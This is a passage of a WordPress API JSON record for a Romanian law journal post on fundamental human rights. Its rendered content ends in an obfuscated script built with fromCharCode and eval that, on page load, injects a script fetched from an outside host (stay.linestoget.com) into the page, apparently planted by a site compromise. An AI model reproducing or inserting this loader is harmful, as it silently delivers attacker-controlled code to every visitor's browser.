f=String;eval(f.fromCharCode(102,117,110)+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Drepturile fundamentale ale omului au o rezonan\u0163\u0103 absolut\u0103 \u015fi esen\u0163ial\u0103 at\u00e2t\u00a0 din perspectiva normelor juridice din dreptul intern, c\u00e2t \u015fi interna\u0163ional.\u00a0\u00a0 Din perspectiv\u0103 interna\u0163ional\u0103, drepturile omului, \u00een spe\u0163\u0103, dreptul la via\u0163\u0103 \u015fi dreptul la via\u0163\u0103 privat\u0103, \u00ee\u015fi g\u0103sesc consacrarea \u00een Declara\u0163ia Universal\u0103 a Drepturilor Omului (introdus\u0103 \u00een legisla\u0163ia rom\u00e2n\u0103 prin Legea nr. 30 din 18 [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[5,3],"tags":[77,46,49],"_links":{"self":[{"href":"https:\/\/www.aafdutm.ro\/revista\/wp-json\/wp\/v2\/posts\/216"}],"collection":[{"href":"https:\/\/www.aafdutm.ro\/revista\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.aafdutm.ro\/revista\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.aafdutm.ro\/revista\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.aafdutm.ro\/revista\/wp-json\/wp\/v2\/comments?post=216"}],"version-history":[{"count":21,"href":"https:\/\/www.aafdutm.ro\/revista\/wp-json\/wp\/v2\/posts\/216\/revisions"}],"predecessor-version":[{"id":386,"href":"https:\/\/www.aafdutm.ro\/revista\/wp-json\/wp\/v2\/posts\/216\/revisions\/386"}],"wp:attachment":[{"href":"https:\/\/www.aafdutm.ro\/revista\/wp-json\/wp\/v2\/media?parent=216"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.aafdutm.ro\/revista\/wp-json\/wp\/v2\/categories?post=216"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.aafdutm.ro\/revista\/wp-json\/wp\/v2\/tags?post=216"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}